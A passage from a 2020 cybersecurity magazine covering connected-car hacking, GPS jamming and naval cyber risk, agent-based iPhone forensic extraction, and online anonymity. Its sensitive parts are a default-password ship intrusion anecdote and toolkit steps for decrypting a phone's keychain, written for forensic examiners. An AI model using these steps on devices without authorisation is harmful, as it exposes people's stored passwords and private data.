targets in the first place.

The answer to this one is relatively straightforward. You can hack almost anything with an internet signal,

especially if it's an active connection. Internet-based functions in cars, like online radio, are active as they

send and receive commands, meaning you can hack them.

Some vehicles use Internet of Things (IoT) devices to do things like track engine performance or measure

fuel efficiency. These sensors provide hackers with another point of entry if they don't include proper

security features.

Is There a Precedent for Vehicle Hacking?

So has anyone hacked into a vehicle before? Yes, and vehicle hacking incidents may be more frequent

than you'd think. According to the cybersecurity firm Upstream, there were roughly 150 car hacking

incidents in 2019.

Considering how many connected cars there are, that figure isn't that massive. You should also consider

that this number also includes hacks on automotive companies, not just cars themselves. Still, it

represents a 99% increase over 2018's hacking incidents, which is a troubling trend.

While these real-world instances may not have been too harmful, tests show that they could be. In 2015,

hackers remotely cut the power of a Jeep as it was driving in a demonstration for Wired. If this were to

happen outside of a safety showcase, it could have disastrous results.

Responses from Manufacturers

Some good news is that vehicle manufacturers are aware of these potential risks. After the 2015 Wired

hacking demonstration, Fiat Chrysler sent 1.4 million car owners flash drives containing software patches.

Similarly, Tesla updated all Model Xs after researchers hacked into one and activated its brakes.

Both of these instances involve manufacturers responding to an issue they initially missed. Had malicious

actors exploited these problems before white-hat hackers, they could've been much more severe issues.

Cyber Defense eMagazineJuly 2020 Edition 82

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Still, with these cases attracting media attention, more manufacturers will take cybersecurity seriously

while in production.

As vehicles become more teched-out, it means more tech experts are involved in the design and

production process. With the presence of these voices, manufacturers could take a greater interest in

cybersecurity.

Defending Against Vehicle Hacking

Drivers of connected cars aren't helpless concerning cybersecurity. Built-in cybersecurity systems are a

necessary step in vehicle production, but drivers can protect themselves in other ways. The rising

concerns over vehicle cybersecurity have led to the emergence of companies selling third-party security

solutions for cars.

Operators using IoT devices in their vehicles should ask the device providers about security features.

Experts also recommend that they require transparency and high standards from any company that

receives data from these sensors. Fleets shouldn't work with any business that doesn't showcase

appropriate data governance.

If more owners and drivers speak up about security issues, manufacturers will likely respond to the market

pressure. As the public shows interest in security, the producers will offer it.

Security Expert Recommendations

To recap everything we've established so far: hacking vehicles is possible and has some precedent, and

manufacturers are addressing the issue. Additionally, drivers can protect themselves as a supplementary

layer of security. The last step in deciding whether this is a cause for worry is looking to the experts. So

what do they think?

Cybersecurity authorities have become increasingly concerned with vehicle hacking in the past few years.

Late last year, the Federal Bureau of Investigation (FBI) warned of growing cyberthreats in the automotive

industry. The Bureau cited the increase of data coming from vehicles as a reason why hackers may target

cars.

In response to these threats, the FBI suggested auto companies take cybersecurity more seriously.

Notice they didn't say to abandon the concept of a connected car altogether. Manufacturers should just

keep security at the forefront.

Vehicle Cybersecurity Today and Tomorrow

With all these factors in mind, should we be worried about vehicle hacking? There may not be a cause

for worry, but there is certainly reason for increased concern. This issue is a minor one right now, but it's

also growing. It requires adequate attention, but not panic.

Cyber Defense eMagazineJuly 2020 Edition 83

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Vehicle hacking isn't a widespread problem today, but it could become one in the future. Manufacturers

should start investing in more thorough security solutions as they add more internet-enabled functions to

their automobiles. By addressing these issues today, we can stop a crisis tomorrow.

The Age of IoT Brings New Challenges

Technological revolutions always come with some growing pains. As the IoT becomes more prevalent,

cybersecurity likewise turns into a more pressing concern. That doesn't mean we should avoid the era of

connectivity, but that we should take care to secure it.

You shouldn't worry about vehicle hacking, but you should take it seriously. With a widespread effort to

combat security issues before they appear, the future of connected vehicles will come sooner.

About the Author

Martin Banks is the founder and Editor-in-Chief of Modded. You can find

his writing all over the internet. He covers tech, gear, cars, and more.

Cyber Defense eMagazineJuly 2020 Edition 84

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Attacks at Sea: Blinding Warships.

Are GPS completely vulnerable to cyberattacks?

By Julien Chesaux, Cyber Security Consultant, Kudelski Security

Who Controls the Sea, Controls the World

The annual multilateral exercise between the U.S. and Thai army, named “Cobra Gold”1 sees the

deployment of the latest navy warships as a proof of military domination in a contested region and

reminds us the fragility of technologies at sea as a chain of incidents demonstrated in 2017.

The world’s oceans can be beautiful and awe-inspiring, but also very dangerous. Most importantly, they

are strategic for the global economy and, consequently, countries compete to control them. Statistics

reveal the high value of the high seas: 70% of the globe is covered by water and over 90% of the world’s

trade is carried by sea. Moreover, the global merchant fleet totals 50,000 ships that move 9 billion tons

of merchandise annually, representing a turnover of $2,000 billion.2

Human history is punctuated with many regional or global exchanges that happened through decisive

battles at sea. The battle of Salamin saw the Athenians saving the concept of democracy against the

Persians. The battle of Actium allowed the Roman Republic to become an Empire. The battle of Trafalgar

destroyed Napoleon’s aspiration to invade Britain.

At the beginning of the 20th century, in 1905, the battle of Tsushima humiliated the Russian Empire and

opened the pathway for an Imperial Japan. During WWI, the battle of Jutland contained the Imperial

1

WILLIAMS Zachary. “Cobra Gold 2020: America’s Strategic Shift in Southeast Asia”, The Diplomat, Mar 6, 2020

https://thediplomat.com/2020/03/cobra-gold-2020-americas-strategic-shift-in-southeast-asia/

2

Sea Europe. “2017 Market Forecast Report”, Sea Europe, 2016

https://maritimetechnology.nl/media/2017-Market-Forecast-Report-finaal.pdf

Cyber Defense eMagazineJuly 2020 Edition 85

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


German Navy and WWII witnessed the battle of Midway that established the U.S. as the new navy

superpower after the destruction of Japanese’s aircraft carriers fleet in the Pacific. More recently, the

Crimea annexation by Russia was, even if triggered by different causes, a geopolitical move to avoid the

loss of access to the Mediterranean Sea.

The current hawkish posture and the “gunboat diplomacy” followed by China is not a surprise regarding

its ambitions to play a greater global leadership role, to protect its shores where most of its economic

activity occurs (its “strategic belt”), and to defend its natural resources and sea lines to supply them from

the South and East China Seas (represented by the Nine-Dash) to the Indian Ocean (currently projected

as the “String of Pearls”3).

A Global Rivalry with Multiple Bottlenecks

Because globalization increases global trade, sea roads are busy and multiple bottlenecks are under the

spotlight, including many straits and canals. For instance, the Strait of Malacca represents 40 % of global

trade, 50% of energy trade, and is indispensable for regional hegemons like China and Japan.

Another geostrategic path is the Strait of Hormuz, between Oman and Iran, through which all the Gulf oil

trade moves. In this region, the U.S. Navy is face-to-face with the Iranian one. The USS Harry S. Truman

aircraft carrier is presently deployed in the Arabian Sea (near Oman) as part of the U.S. 5th fleet, which

covers the Middle East, a crucial region for the U.S. as 18% of its imported oil comes from the Persian

Gulf countries.4 In 1967, the blockade of the Strait of Tiran by Egypt was used as casus belli by Israel

and started the Six-Day War. Indeed, the Strait is the only way to leave the Gulf of Aqaba and gain access

to Iran’s oil. Other important passages such as the Bab El-Mandab Strait, the Danish Straits, or the

Bosporus are well-known narrow gullies.

Canals are equally critical for international trade, especially the Suez and the Panama ones. The former

was the theater of a war in 1956 between Egypt and a French, British and Israeli alliance (encompassed

in the secretive Protocol of Sèvres) to regain control after being nationalized by the infamous Egyptian

President Nasser. The latter, under U.S. control for almost 100 years, was retroceded to Panama and

recently enlarged to accommodate the new bigger ships and ensure revenue to Panama as it represents

5.5 % of its GDP.

The Art of Hacking Navigation Systems

In 2017, some incidents at sea have sparked interrogations as hundreds of South Korean fishing vessels

returned earlier to port after their GPS (Global Positioning System) signals were jammed, allegedly by

3

HUGHES Lindsay. “String of Pearls Redux: Increased Concern for India”, Future Directions International, Nov 13, 2018

http://www.futuredirections.org.au/publication/string-of-pearls-redux-increased-concern-for-india/

4

U.S. Energy Information Administration (EIA). “How much petroleum the United States import and export?”, EIA, Apr 4, 2017

https://www.eia.gov/tools/faqs/faq.php?id=727&t=6

Cyber Defense eMagazineJuly 2020 Edition 86

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


North Korean hackers.5 Later this year, a ship in the Black Sea reported to the U.S. Coast Guard

Navigation Center that its GPS system had been disrupted and that over 20 ships in the same area had

been similarly affected.6 In Asian waters, deadly collisions happened twice in two months; In June 2017,

the USS Fitzgerald was struck by a container ship off the coast of Japan, killing 7 sailors. Later during

the year, an oil tanker smashed the USS John S. McCain near Malaysian coast and 10 sailors died.7

There were also two other lesser-known incidents in 2017: in January, the USS Antietam ran aground

near its base in Japan and in May the USS Lake Champlain collided with a South Korean fishing vessel.8

Consequently, Vice Admiral Joseph Aucoin was relieved of his duty as commander of the U.S. 7th Fleet,

the largest forward-deployed U.S. fleet based in Japan and covering Asia.9

The causes of all these incidents are not clear. Some experts blame the weather, the heavily reliance on

technology, the feeble signal of GPS, cyberattacks, the diminution of crew members or the high pace of

deployment lacking training and maintenance. Regarding the number of incidents in a less-than-one-year

period and the highly disputed regions where incidents happened (South East Asia and East Asia), the

theory of a deliberated influence on navigation systems through cyberattacks is legitimate, especially

when the navigation system used is analyzed.

Ships orientate themselves through Global Navigation Satellite System (GNSS) with many countries

using their own: GPS for the U.S., GLONASS for Russia, GALILEO for the E.U., QZSS for Japan, BeiDou

for China, and NAVIC for India. Although precise to a few meters, this technology is not highly secure

because the message is feeble and can be hacked. The same year of these incidents, a security

researcher based in France was able to enter the satellite communications system of a ship: Through

Shodan, a specific search engine that can reveal connected devices, and by entering a simple username

(admin) and password (1234), he accessed the communication center of a commercial ship and posted

his performance on Twitter: “I’m connected to a mother****ing ship as admin right now. Hacking ships is

easy”.10

New Alternatives

To prevent this over-dependency on GNSS for Positioning, Navigation and Timing (PNT), some states

are developing alternatives that rely on radio frequency, an old technology used since WWII. One of

5

SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017

https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT

6

Ibid.

7

FIFIELD Anna. “Bodies of all 10 sailors missing on USS John S. McCain have been recovered”, The Washington Post, Aug 27, 2017

https://www.washingtonpost.com/world/bodies-of-all-10-sailors-missing-on-uss-john-s-mccain-have-been-recovered/2017/08/27/a2af6c4a-8b8c-11e7-

a2b0-e68cbf0b1f19_story.html

8

BARANIUK Chris. “Why it’s not surprising that ship collisions still happen”, BBC, Aug 22, 2017

http://www.bbc.com/future/story/20170822-why-its-not-surprising-that-ship-collisions-still-happen

9

AFP. “U.S. Warship Collisions Raise Cyberattack Fears”, Security Week, Aug 23, 2017

http://www.securityweek.com/us-warship-collisions-raise-cyberattack-fears

10

CHAMBERS Sam. “Ship’s satellite communication system hacked with ease”, Splash 24/7, Jul 19, 2017

http://splash247.com/ships-satellite-communication-system-hacked-ease/

Cyber Defense eMagazineJuly 2020 Edition 87

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


these systems is called eLoran (Enhanced LOnge-RAnge Navigation) and although it is less accurate,

regional, and only two-dimensional, it offers a powerful signal that deters jamming or spoofing.11 The

cost and the political inertia thwarted this technology, but this is likely to change given these events.

South Korea is currently testing this technology and Russia is developing its own eLoran named

eChayka.12 In the U.S., the Director of National Intelligence told a Senate committee that the global

threat of electronic warfare attacks against space systems would rise in coming years and the U.S. Navy

launched a Hack-Our-Ship event to assess cyber threats at sea, such as hacking a complex system

software system simulating the ones used to control the U.S. Navy fleets.13,14

Military and Economic Implications

In network-centric warfare, the military relies on information gathering to Observe, Orient, Decide, Act

(the OODA loop) and GNSS are part of the tools to collect it. In the battlefield, it is the capacity to make

the right decision as quickly as possible, and most specifically quicker than your enemy, that makes the

difference between victory/life or defeat/death. Therefore, an army relying too much on one technology

could be “blinded” during a conflict and unable to allocate forces efficiently.

Following 19th Century American Navy Strategist Alfred T. Mahan, the U.S. developed a great power

projection capability after WWII that enables it to rapidly deploy military means to defend any interest

whether political, economic, military or humanitarian. Power projection is a mix of hard and soft power,

depending on the situation. This approach is materialized by aircraft carriers and the separation of fleets

allocated to specific regions of the globe (7 for the U.S. Navy).

Aircraft carriers are not travelling the sea alone and an entire structure of ships and submarines escort

them, known as a carrier strike group (CSG), with a total crew of more than 7,500.15 The total acquisition

cost of a CSG exceeds $25 billion, an air wing (the aircrafts on the aircraft carrier) another $10 billion and

estimated annual operating costs are around $1 billion.16 Currently, the U.S. has 10 Nimitz-class nuclearpowered

supercarriers. Therefore, a major cyberattack on navigation systems, for example, could

paralyze an entire CSG and considerably diminish the U.S. ability to maneuver.

On the economic side, the world’s largest container ship and supply vessel company, Moller-Maersk,

suffered from the wiper malware attack named NotPetya and the company reported a loss between USD

11

SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017

https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT

12

DUNN John E. “Cyberattacks on GPS leave ships sailing in dangerous waters”, Naked Security, Aug 7, 2017

https://nakedsecurity.sophos.com/2017/08/07/cyberattacks-on-gps-leave-ships-sailing-in-dangerous-waters/

13

SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017

https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT

14

OWENS Katherine. “Navy conducts ‘Hack-Our-Ship’ cybersecurity event”, Defense Systems, Mar 13, 2017

https://defensesystems.com/articles/2017/03/13/hacknavy.aspx

15

WISE David W. “The U.S. Navy’s Big Mistake – Building Tons of Supercarriers”, War Is Boring, Dec 25, 2016

https://warisboring.com/the-u-s-navys-big-mistake-building-tons-of-supercarriers/

16

Ibid.

Cyber Defense eMagazineJuly 2020 Edition 88

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


200-300 million for Q3 2017.17 More specifically, navigation systems such as the Electronic Chart

Display (ECDIS) are very vulnerable and have also been hit with different attacks being reported in Asia.

According to the maritime technical lead at cyber security firm NCC Group, "Ecdis systems pretty much

never have anti-virus".18

Pyongyang Hackers are Smart

Both of the military vessels involved in collisions, the USS Fitzgerald and the USS John S. McCain, are

guided missile destroyers equipped with the Aegis Ballistic Missile Defense System (BMDS), which is a

system allowing the interception of an ICBM (Intercontinental Ballistic Missile), the ones that are currently

being tested by North Korea and usually equipped with one or multiple nuclear warheads. An ICBM has

four phases: boost, post-boost/ascent, midcourse and terminal (reentry in the atmosphere). The Aegis

BMDS aims at destroying an ICBM during the post-boost/ascent phase (before the missile leaves earth’s

atmosphere).

The Lazarus hacking group, famous for the Sony breach in 2014 and allegedly linked to North Korea,

targets individuals associated with U.S. defense contractors with the same tools and tactics of the Sony

breach. This time, the phishing emails display fake job listings and companies’ internal policies.19 Some

jobs listed were for the US (Terminal High Altitude Area Defense) THAAD system, which is a BMDS and

intercept an ICBM in its terminal phase (after the missile re-enters in the atmosphere).

Therefore, if the four U.S. Navy collisions in Asian waters are due to a cyberattack, the explanation could

be that the North Korean government is attempting to infiltrate the U.S. military system to be able to

collect information on the full spectrum of BMDS and, at best, disrupt the defense systems against its

ICBM. On the diplomatic side, it could be a strong message sent to the US and its Asian allies assuring

them that Pyongyang has serious capabilities and that it would be better to negotiate with it than escalate

tensions.

This strategy is part of a general trend in APT (Advanced Persistent Threats), long-term targeted specific

cyberattacks mixing a combination of social engineering, cyberweapons, and vectors to get inside

networks, instead of hacking directly the big fish such as the Department of Defense or a big player in

weapons (Aegis, Boeing, Lockheed Martin, etc.), hackers will target a third party working for these targets.

Indeed, their cybersecurity posture will be lower than a critical administration or company with

technologies and processes in places regarding cyberdefense, and with aware employees towards

phishing campaigns.

17

MIMOSO Michael. “MAERSK Shipping Reports $300M Loss Stemming from NotPetya Attack”, Threatpost, Aug 16, 2017

https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/

18

BARANIUK Chris. “How hackers are targeting the shipping industry”, BBC, Aug 18, 2017

http://www.bbc.com/news/technology-40685821

19

BARTH Bradley. “Lazarus Group tied to new phishing campaign targeting defense industry workers”, SC Media, Aug 14, 2017

https://www.scmagazine.com/lazarus-group-tied-to-new-phishing-campaign-targeting-defense-industry-workers/article/681701/

Cyber Defense eMagazineJuly 2020 Edition 89

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Future Tensions at Sea

Among many strategic hotspots, the most sensitive ones are currently the Indian Ocean, the South and

East China Seas, and, for the foreseeable future, the Artic.

The Indian Ocean is now a space of geopolitical criticality from a maritime perspective, especially now

that the U.S. wants to improve its relations with New Delhi to counterbalance Beijing’s aspirations in the

context of the BRI (Belt and Road Initiative). China is determined to change the status quo in this region

and is investing in ports (i.e. the String of Pearls) to control the flow of merchandise along sea lines from

China to the Middle East and Africa.

Indeed, these sea lines through the Indian Ocean are vital for China’s oil imports, as about 40% comes

through the Strait of Hormuz and over 80% through the Malacca Strait.20 Thus, the rationale of shifting

from a land-based armed force to a sea-based one is to defend these interests at sea and protect China

as a regional hegemon. Hence, the people’s liberation army is building aircraft carriers, submarines,

patrol vessels, and has put in place an A2/AD (Anti Access/Area Denial) tactic with investments on shorebased

anti-ship missiles. Ultimately, China wants to push the U.S. behind its second island chains (at the

east side of the Philippine Sea).

As pointed out by The Economist, the Asia Pacific is the trade region of the future: Eight out of the world’s

ten busiest container ports are there. Two-thirds of the world’s oil shipments travel across the Indian

Ocean. Almost 30% of maritime trade goes across the South China Sea; it accounts for over 10% of

world fisheries production and is thought to have oil and natural-gas deposits beneath its seabed.21

Another strategic hotspot will emerge northward: the Arctic. Within decades, the ice melting phenomenon

will open shipping lanes, allowing vessels like Russia’s first ice class LNG (Liquefied Natural Gas) tanker

to travel through the region. It will also increase disputes for the access to resources and to preserve its

fragile ecosystem.22

Like in Rudyard Kipling’s novel “Kim” where he made popular the great game at stake between the British

and Russian empires to control Central Asia in the 19th Century, the new great game is now between

the US and China for the control of all Asia. This rivalry will encompass the use and leverage of sea

power as naval strategist Alfred T. Mahan put in perspective in “The Influence of Sea Power Upon History”

as national prosperity and power depend on the control of world's sea-lanes, thus: "Whoever rules the

waves rules the world".23

20

The Economist. “Who rules the waves?”, The Economist, Oct 17, 2015

https://www.economist.com/news/international/21674648-china-no-longer-accepts-america-should-be-asia-pacifics-dominant-naval-power-who-rules

21

The Economist. “Who rules the waves?”, The Economist, Oct 17, 2015

https://www.economist.com/news/international/21674648-china-no-longer-accepts-america-should-be-asia-pacifics-dominant-naval-power-who-rules

22

Author interviews. “‘Stavridis’ Book ‘Sea Power’ Explains Why Oceans Matter in Global Politics”, NPR, Jun 6, 2017

http://www.npr.org/2017/06/06/531701056/stavridis-book-sea-power-explains-why-oceans-matter-in-global-politics

23

MAHAN Alfred Thayer, “The Influence of Sea Power upon History: 1660-1783” Little, Brown and Company, Boston, 1890

Cyber Defense eMagazineJuly 2020 Edition 90

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


About the Author

Julien Chesaux is a Cyber Security Consultant at Kudelski Security, a

Swiss and American cyber security company. Julien mainly works on

cyber security, information security and geopolitics analysis in order to

help clients to find solutions regarding their threats. He is also a speaker

and writer for different think tanks, journals and events. He has worked in

diplomacy and cyber security for 10 years in Switzerland, Australia, the

Balkans and France. His main research interests are Global Security,

Cyber Geopolitics, and International Affairs.

LinkedIn profile: www.linkedin.com/in/julien-chesaux-65279456

You can reach me at julien.chesaux@gmail.com

Cyber Defense eMagazineJuly 2020 Edition 91

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Iphone Extraction Without A Jailbreak

Imaging the file system and decrypting the keychain from iOS devices without jailbreaking

By Oleg Afonin, Security Researcher, ElcomSoft Co.Ltd.

Traditionally, forensic experts without access to proprietary technologies had relied upon jailbreaks to

perform the lowest-level extraction of Apple iOS devices. Using jailbreaks, even advanced ones exploiting

hardware vulnerabilities, presents a number of challenges. In this article, we are offering an alternative

method for accessing the content of iOS devices that does not require jailbreaking.

Jailbreak-based acquisition

Before covering jailbreak-free extraction, let’s talk about jailbreaks.

Why is a jailbreak needed during the course of file system extraction? Jailbreaking the device allows

experts to raise privileges to the level required to access the protected file system on the device, which

is simply not possible on Apple devices without superuser access. In addition, a jailbreak was the only

way to extract and decrypt the complete content of the keychain containing all of the user’s saved

password and things such as certificates, identities and encryption keys (e.g. keys to encrypted

databases of third-party password managers). In other words, a jailbreak was (and still is) used to obtain

the required level of privileges for accessing things such as application sandboxes, stored passwords

and encryption keys.

Cyber Defense eMagazineJuly 2020 Edition 92

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Why not just keep using a jailbreak?

If jailbreaks are such a great thing, why don’t we keep using them for low-level extractions? The thing is,

jailbreaks bring their share of problems. First and most importantly, public jailbreaks were never meant

for mobile forensics. Installing a jailbreak unnecessarily modifies the system partition (making the postacquisition

future of the device iffy). Since public jailbreaks are designed to allow running unsigned code

(such as the various apps downloaded from third-party app stores), they do a lot more (and a lot deeper)

modifications to the system than would be necessary for the purpose of forensic acquisition.

Finding the right jailbreak and installing it properly may also become a challenge if you are not

accustomed to this sort of things. For these and other reasons, jailbreaking may not be an option for

some experts. This is where jailbreak-free acquisition comes to help.

How jailbreak-free acquisition works

In the previous chapter, I wrote that one needs low-level access to the file system in order to perform the

extraction, and this still stands even if you are not going to use a jailbreak. We developed a different

method for obtaining the required level of privileges on a wide range of iOS devices. Explaining the

essence of the method brings us back to jailbreaking.

Essentially, a jailbreak exploits several vulnerabilities discovered in a given version of iOS or a range of

versions of iOS. The vulnerabilities are exploited consecutively one after another, which makes it a chain

of vulnerabilities to exploit. A jailbreak requires a number of different exploits to escape sandbox, obtain

superuser access and disable various protections iOS has in place to prevent this sort of things. Finally,

a jailbreak opens read/write access to the system partition and patches several files in order to disable

signature verification, which allows installing apps missing Apple approval from third-party app stores.

While this is a grand oversimplification, you get the idea: a jailbreak does a lot of things that aren’t

necessary for just extracting the file system and obtaining the keychain.

A given jailbreak can be installed on a given version of iOS (or a range of versions of iOS). Different

jailbreaks are required to break into the different versions of the system since different exploits are

required. Our method automatically detects the installed version of iOS and applies exactly those exploits

that are minimally required to obtain access to the file system. To do that, one must sign and install the

‘agent’ app to the device, and then use that agent to extract the file system and decrypt the keychain.

Unlike jailbreaks, the agent performs all modifications in the device’s volatile memory (RAM) without

writing any unnecessary stuff into persistent storage. The agent does not even touch the system partition,

leaving the post-acquisition device perfectly usable and updatable.

Why choose jailbreak-free extraction over jailbreaks

There are numerous advantages of agent-based extraction over jailbreaks.

1. Jailbreak-free extraction is safe. The agent does not touch the system partition, leaving the device

in a clean state after the acquisition.

Cyber Defense eMagazineJuly 2020 Edition 93

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


2. Clean and forensically sound. The agent does not write any unnecessary stuff onto the data

partition, and does not leave any traces behind sans a few records in the system log.

3. Much easier to handle. Most jailbreaks (except checkra1n, which uses a hardware exploit) are

limited to a narrow range of iOS versions. The agent has all the exploits required to gain access

to the data, and automatically applies the right exploit for a given version of iOS.

4. Robust operation. Jailbreaks are wonky to install, (very) frequently failing without an obvious

reason and no path forward. We are yet to see a single case where the agent would fail on a

supported platform.

5. Offline operation. The agent can and should be installed with the device being in Airplane mode.

An Internet connection on the iPhone is never required, making it a safe, risk-free extraction.

Agent-based extraction also has two major drawbacks.

1. You will absolutely need a Developer account with Apple to sign and install the agent. A Developer

account with Apple costs money (around $100/year if you use a personal one).

2. The agent is available for a wide but still limited range of iOS versions, currently supporting iOS

10.0 through iOS 13.4.1 inclusive. Extracting an iPhone running a newer iOS build would be only

possible if we discover the corresponding exploit. Alternatively, the checkra1n jailbreak may be

available if the device is an iPhone 8, 8 Plus or iPhone X or older.

How to use jailbreak-free extraction

Jailbreak-free extraction is available through Elcomsoft iOS Forensic Toolkit. You will also need an Apple

ID enrolled in Apple’s Developer Program, and have an app-specific password created in your profile.

Write down that password, you’ll need it to sign the extraction agent. The acquisition steps are:

1. Connect the iPhone to your computer. Approve pairing request (you may have to enter the

passcode on the device to do that).

2. Launch Elcomsoft iOS Forensic Toolkit. The main menu will appear.

3. We strongly recommend performing logical acquisition first (by creating the backup, extracting

media files etc.)

4. For agent-based extraction, you’ll be using numeric commands.

5. Press 1 to install the agent onto the iPhone. Enter the Apple ID and the app-specific password

you’ve created in the developer profile, then type the ‘Team ID’ related to your developer account.

6. The agent is installed on the device. Tap on the Agent icon on the iPhone to launch it, and keep

it in the foreground during the extraction.

7. Press 2 to extract and decrypt the keychain (you can view it in Elcomsoft Phone Viewer).

8. Press 3 to capture the file system image. The tool uses the TAR format to save the file system

image. You can view it with Elcomsoft Phone Viewer or third-party forensic tools.

9. Press 4 to clean-up and uninstall the agent from the iPhone.

Cyber Defense eMagazineJuly 2020 Edition 94

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Conclusion

Jailbreak-free acquisition has numerous advantages over jailbreaks, and only two drawbacks. If your iOS

device falls in the supported range of iOS 10.0 through 13.4.1, we strongly recommend sticking with the

new, jailbreak-free acquisition method. If the iPhone you are analyzing is based on an unsupported

platform, a compatible jailbreak may still be an option.

About the Author

Oleg Afonin is ElcomSoft’s security researcher and mobile forensic

specialist. He is a frequent speaker at industry-known conferences

such as CEIC, HTCIA, FT-Day, Techno Forensics and others. Oleg

co-authored multiple publications on IT security and mobile

forensics. With years of experience in digital forensics and security

domain, Oleg led forensic training courses for law enforcement

departments in multiple countries.

Oleg can be reached online at (o.afonin@elcomsoft.com, https://twitter.com/elcomsoft or

https://t.me/elcomsoft) and at our company website www.elcomsoft.com

Cyber Defense eMagazineJuly 2020 Edition 95

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


How to Maintain Anonymity in Communications?

By Milica D. Djekic

The kids would love to play the games. They would not be attracted with the computer’s games only, but

rather with some being so creative, engaging and imagination needing. As they do so they would imagine

that they are some fictional characters and the entire play would get some deep meaning to them. That’s

how the children would build up their personalities, psychology and minds. When they grow up some of

those habits would remain with them. Maybe they would not express those sides of their personalities

then, but they would cope with the clear memories and subconscious drives about those occurrences.

We would never know what can trigger some kind of the behavior with the adult people as long as we

are not familiar with their childhood and personal development. Some kids would enjoy playing the social

games developing their social intelligence and skill, while the others would choose the world of loneliness

doing some reading, writing or drawing. The both cases could give the amazing creativity to the

prospective adults and in our opinion – it’s important to find the balance between the social and

introspection’s skills. When the parents are rising their kids they should know that the best practice in

such a case could be to let their offspring become what they want to be, but some kind of supervision

and advising is necessary in order to define the borders that the youth can expect in their lives and social

connections. The well-applied measure of forming someone’s character is through the model of

rewarding and punishing and the proper family education must take that sort of teaching into account.

One of the favorite games to many kids is making the call and talking to someone through the tissue. In

such a game, they would make a voice and get completely unrecognizable as they would use some

covering to speak through so. They would usually do so in the company for getting some fun and joking

the people on the line. Basically, everything would start as so innocent kids’ game and literally the stuffs

are under control as long as that behavior is just the way of playing. Also, there would be some children

that would make their voice being unrecognizable doing some misrepresentation and make the fully

fictional story about anything. Someone would say that their imagination could lead them so far away,

Cyber Defense eMagazineJuly 2020 Edition 96

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


ut the case is if such a behavior is not restricted at its beginning it can cause the serious troubles the

later on if that person does not quit with such habits. In other words, those individuals could continue

playing “no one would see me” game and get the real concern to their surroundings. Any security

professional would recognize it’s all about someone who would cope with the deep need to hide his

identity and those habits could get adopted early in the childhood. So, in order to prevent the new

generation of weird adults it’s needed to follow the progress of the children not only through schooling,

but rather via the social activities. So, if the strict questions with the psychology’s interview are made and

if anyone is reporting about such a strange behavior some measures of teaching should get applied.

Practically, the next step in such a development could be that such individuals could figure out that the

phone line with the changed voice is not that interesting toy any longer, so some kind of the transmission

into the cyberspace could work better.

The fact is the computer with the internet connectivity could provide us a plenty of opportunities to remain

hidden behind some profile or account. In addition, there are the entire anonymity solutions being

developed that can serve to stay anonymous and still in position to share your story or content with many.

Indeed, these sorts of the systems could get used for the security purposes when needed to protect your

identity and exchange some vitally important information. So, the phone with the tissue on is for the kids

– the real hackers would rely on so sophisticated cyber infrastructure. From such a point of view, it’s only

the business and many would do that for the money, but there are still so many unhealthy minds that

would choose their victims in order to do bullying or provide the fake news to the communities. The main

concern with the Darknet anonymity systems is that they would be the role-based ones and they would

use the quite strong encryption, so if on the inaccessible spots there would be some difficulties to confirm

the identity of the information sharer. We would say the places that are not easily approachable for a

reason we would get in mind the terrorist groups that would take advantage over such well-developed

systems and send the disinformation wherever they can. In other words, the innocent kid’s game could

lead to the serious security concern, so from this perspective – the Pandora box would get opened as

there would appear so many questions pointing the motives of the heavy cases to commit so harsh

crimes.

Even the kid can get how significant can be to appear as the trusted person and they can try to imitate

the voice of the adult people in order to trick or confuse someone. The similar situation is with the Darknet

asset as so many its users would recognize the power of the trusted account or at least convincing

someone that they are the trusted persons. If anyone accepts that he is talking to the trusted individual

he can give the information he normally would not and the bad guys could use such a campaign to collect

the intelligence and figure out something they would never do. The timing and accurate information can

mean the victory in the war, so it’s from the strategic significance to adopt the measures and techniques

in order to prevent, observe and respond to such and similar cases in the practice.

Who is from another Side of Cord?

Doing some anonymity operations the bad guys would go through some experience believing something

so important is happening on. Possibly they would develop those needs in the childhood and they would

cope with the very vivid inner experiences that would motivate them to proceed with such an activity.

Their motto could be that no one would even get who is on another side of the cord, so from their point

of view it may appear as quite exciting and interesting doing so. The aim of the terrorism is to spread the

fear and panics amongst the community members, so that’s why someone with the vivid imagination

would make so horrifying stories that would get used to intimidate the quite broad population. Probably

that special effect suggesting that – I know you, but you do not know me! – would deeply motivate the

bad guys to believe they have some sort of the power over other people’s lives and security. It’s quite

Cyber Defense eMagazineJuly 2020 Edition 97

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


dangerous playing those games in the adulthood, so what’s so needed is to understand the motives of

the persons doing so for a reason once the motive is defined the crime would stop.

Why Does Identity Matter?

It’s not only about the terrorist and criminal organizations to hide their identity – so many defense

professionals would choose to carefully manage their identity as the way of security and privacy

measures getting applied on their tasks. In other words, it’s not smart at all going around and sharing all

you know with everyone as that could be the huge threat to someone’s life and business. So, the wellknown

Deep Web solutions are designed by the defense communities, but at the moment they are

available to anyone for more or less obvious reasons. The identity matters in any case and once the

people are convinced that some account is trusted they can try to share a lot of findings with such a

profile. The modern history would teach us how life can be hard and why it’s important to take some

measures of protection.

